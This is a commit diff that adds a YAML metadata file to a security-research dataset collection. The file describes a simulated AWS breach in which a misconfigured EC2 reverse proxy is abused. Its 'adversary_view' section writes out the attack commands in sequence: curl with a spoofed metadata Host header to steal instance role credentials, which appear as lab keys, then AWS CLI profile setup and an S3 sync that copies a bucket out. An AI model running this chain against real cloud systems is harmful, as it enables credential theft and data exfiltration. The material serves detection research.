khulnasoft commited on
Commit
d7c8a21
1 Parent(s): 7945a0d

Create datasets/atomic/_metadata/SDAWS-200914011940.yaml

Browse files
datasets/atomic/_metadata/SDAWS-200914011940.yaml ADDED
@@ -0,0 +1,75 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ title: AWS Cloud Bank Breach S3
2
+ id: SDAWS-200914011940
3
+ contributors:
4
+ - Roberto Rodriguez @Cyb3rWard0g
5
+ creation_date: 2020/09/13
6
+ modification_date: 2020/09/13
7
+ platform:
8
+ - AWS
9
+ type: atomic
10
+ tags:
11
+ - EC2 Proxy Abuse
12
+ - S3 Data Exfiltration
13
+ description: This dataset represents adversaries abusing a misconfigured EC2 reverse proxy to obtain instance profile keys and eventually exfiltrate files from an S3 bucket.
14
+ attack_mappings:
15
+ - technique: T1078
16
+ sub-technique: "004"
17
+ tactics:
18
+ - TA0001
19
+ - TA0003
20
+ - TA0004
21
+ - TA0005
22
+ - technique: T1530
23
+ sub-technique:
24
+ tactics:
25
+ - TA0009
26
+ notebooks:
27
+ files:
28
+ - type: cloud
29
+ link: https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/aws/collection/ec2_proxy_s3_exfiltration.zip
30
+ simulation:
31
+ environment: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
32
+ tools:
33
+ - type: Cloud Formation Templates
34
+ name: AWS CLI
35
+ module: Exfiltration
36
+ script: https://github.com/OTRF/mordor-labs/tree/master/environments/aws/cloud-breach-s3
37
+ permissions_required:
38
+ - user
39
+ adversary_view: |-
40
+ > curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/ -H "Host:169.254.169.254"
41
+ MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 >
42
+
43
+ > curl -s http://35.174.154.220/latest/meta-data/iam/security-credentials/MordorNginxStack-BankingWAFRole-9S3E0UAE1MM0 -H "Host:169.254.169.254"
44
+ {
45
+ "Code" : "Success",
46
+ "LastUpdated" : "2020-09-14T00:49:26Z",
47
+ "Type" : "AWS-HMAC",
48
+ "AccessKeyId" : "ASIA5FLZVX4OPVKKVBMX",
49
+ "SecretAccessKey" : "aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03",
50
+ "Token" : "TOKEN",
51
+ "Expiration" : "2020-09-14T07:10:27Z"
52
+ }
53
+
54
+ > aws configure --profile erratic
55
+ AWS Access Key ID [None]: ASIA5FLZVX4OPVKKVBMX
56
+ AWS Secret Access Key [None]: aD8Hchl4f1BrbfgFvwEBVRZ0oCXrifESaC3B0a03
57
+ Default region name [None]: us-east-1
58
+ Default output format [None]: json
59
+
60
+ > echo aws_session_token = "TOKEN" >> ~/.aws/credentials
61
+
62
+ > aws s3 ls --profile erratic
63
+ 2020-09-13 20:00:32 mordorctstack-s3bucketforcloudtrail-1gj7vvt2ul642
64
+ 2020-09-13 19:59:59 mordors3stack-s3bucket-llp2yingx64a
65
+
66
+ > aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
67
+ 2020-09-13 20:00:26 89 ring.txt
68
+
69
+ > aws s3 ls mordors3stack-s3bucket-llp2yingx64a --profile erratic
70
+ 2020-09-13 20:00:26 89 ring.txt
71
+
72
+ > aws s3 sync s3://mordors3stack-s3bucket-llp2yingx64a . --profile erratic
73
+ download: s3://mordors3stack-s3bucket-llp2yingx64a/ring.txt to ./ring.txt
74
+ references:
75
+ - https://github.com/RhinoSecurityLabs/cloudgoat/tree/master/scenarios/cloud_breach_s3